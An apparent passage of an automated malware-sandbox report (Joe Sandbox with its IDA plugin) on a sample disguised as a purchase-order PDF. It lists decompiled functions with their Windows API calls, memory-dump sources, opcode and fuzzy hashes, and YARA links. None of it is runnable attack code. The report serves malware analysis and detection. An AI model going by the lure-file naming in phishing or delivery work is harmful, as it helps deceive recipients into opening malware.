                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                                                                                                                                                                                                                                            • GetCursorInfo.USER32 ref: 00458E03
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Cursor$Load$Info
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2577412497-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                                                                                                                                                                                                            • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                                                                                                                                                                                                                            Function 00469681 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 004696E0
                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessagePost$CtrlFocus
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 1534620443-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: ebb02e35e6dfa5ffdd7817d168aeee7d0d5ad9fdf08ca2eeb32ac17b4f38c1fd
                                                                                                                                                                                                                                                                                                            • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebb02e35e6dfa5ffdd7817d168aeee7d0d5ad9fdf08ca2eeb32ac17b4f38c1fd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                                                                                                                                                                                                            Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00468107
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 3993528054-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                                                                                                                                                                                                                            • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                                                                                                                                                                                                                                            Function 0046F2B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0046F3BC
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                                                                                                                                                                                                            • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                                            • API String ID: 4085615965-3440237614
                                                                                                                                                                                                                                                                                                            • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                                                                                                                                                                                            • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                                                                                                                                                                                                                                            Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsicoll
                                                                                                                                                                                                                                                                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                                                                                                                                                                                            • API String ID: 3832890014-4202584635
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                                                                                                                                                                                                            • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                                                                                                                                                                                                                                            Function 00466999 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004669C4
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00466A21
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 00466A90
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 00466B3F
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00466BC8
                                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00466D1D
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00466BEE
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00466D4B
                                                                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                                                                                                                                                            • String ID: X$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 3021350936-1944015008
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0a2e95df084d96ac0a9c696da0d05d8742bfbf7a11ed66d71c3638679530d7f4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a2e95df084d96ac0a9c696da0d05d8742bfbf7a11ed66d71c3638679530d7f4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                                                                                                                                                                                                            Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0045F4AE
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: InfoItemMenu$Sleep_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 1504565804-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                                                                                                                                                                                                            Function 004556F8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$CreateDestroy
                                                                                                                                                                                                                                                                                                            • String ID: ,$tooltips_class32
                                                                                                                                                                                                                                                                                                            • API String ID: 1109047481-3856767331
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                                                                                                                                                                                                            • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                                                                                                                                                                                                                            Function 0045CBCC Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0045CD51
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0045CD63
                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
